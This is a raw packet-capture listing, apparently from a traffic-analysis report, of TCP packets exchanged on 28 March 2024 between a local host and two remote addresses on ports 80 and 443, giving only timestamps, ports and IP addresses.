                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.190732956 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.190787077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.190804958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.190845013 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.190953970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.190972090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.190985918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191004992 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191025019 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191066027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191086054 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191119909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191128016 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191155910 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191266060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191281080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191312075 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191323996 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191376925 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191409111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191416025 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191445112 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191853046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191868067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191916943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191922903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191939116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.191943884 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192014933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192024946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192059994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192140102 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192163944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192181110 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192203999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192214012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192257881 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192327023 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192373037 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192430973 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192477942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192624092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192637920 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192655087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192660093 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192671061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192692041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192737103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192758083 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192770004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192800999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192807913 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192846060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.192970037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193007946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193011999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193068981 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193084955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193178892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193216085 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193252087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193290949 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193372011 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193413973 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193454027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193509102 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193548918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193583012 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193645954 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193716049 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193780899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193797112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193835974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193953037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193968058 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.193995953 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194060087 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194073915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194108009 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194185972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194228888 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194243908 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194262981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194287062 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194303989 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194356918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194374084 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194396019 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194431067 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194434881 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194540977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194595098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194663048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194679022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194714069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194739103 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194740057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194823980 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194874048 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194884062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194924116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194928885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.194968939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.195007086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.195348978 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.195513010 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.195601940 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.195857048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.195907116 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.196600914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.196654081 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.197176933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.197238922 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.197480917 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.197532892 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199080944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199094057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199110031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199122906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199126959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199158907 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199229002 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199244976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199259996 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199273109 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199285030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199285984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199300051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199304104 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199316025 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199326038 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199331045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199342966 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199353933 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199356079 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199367046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199371099 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199385881 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199398041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199398041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199413061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199431896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199434042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199444056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199456930 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199460030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199470043 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199476957 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199482918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199496984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199506044 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199508905 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199522018 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199533939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199538946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199546099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199559927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199568987 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199568987 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199572086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199587107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199599028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199603081 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199611902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199629068 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199662924 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199686050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199729919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199881077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199894905 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199932098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199969053 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199985981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.199996948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200017929 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200037956 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200226068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200241089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200280905 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200391054 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200407028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200417995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200438976 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200460911 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200465918 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200501919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200665951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200680971 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200699091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200707912 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.200728893 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.201375008 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.208878040 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.225308895 CET49719443192.168.2.6104.21.65.24
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.225343943 CET44349719104.21.65.24192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.225431919 CET49719443192.168.2.6104.21.65.24
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.244805098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.271353006 CET49719443192.168.2.6104.21.65.24
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.271393061 CET44349719104.21.65.24192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295110941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295134068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295185089 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295202017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295226097 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295264959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295418978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295448065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295469999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295488119 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295625925 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295675039 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295861959 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295928955 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295938015 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.295973063 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296016932 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296049118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296097040 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296205044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296250105 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296262980 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296344042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296355009 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296387911 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296411037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296458006 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296483040 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296519995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296586037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296627998 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296667099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296713114 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296782970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296844959 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296890020 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296940088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.296976089 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297039032 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297086000 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297151089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297245979 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297276020 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297326088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297333956 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297338963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297360897 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297382116 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297434092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297481060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297538042 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297574997 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297580957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297622919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297658920 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297702074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297739029 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297782898 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297848940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297940016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.297985077 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298041105 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298089981 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298145056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298192024 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298239946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298289061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298327923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298372030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298407078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298451900 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298477888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.298521996 CET4971880192.168.2.6103.23.232.80
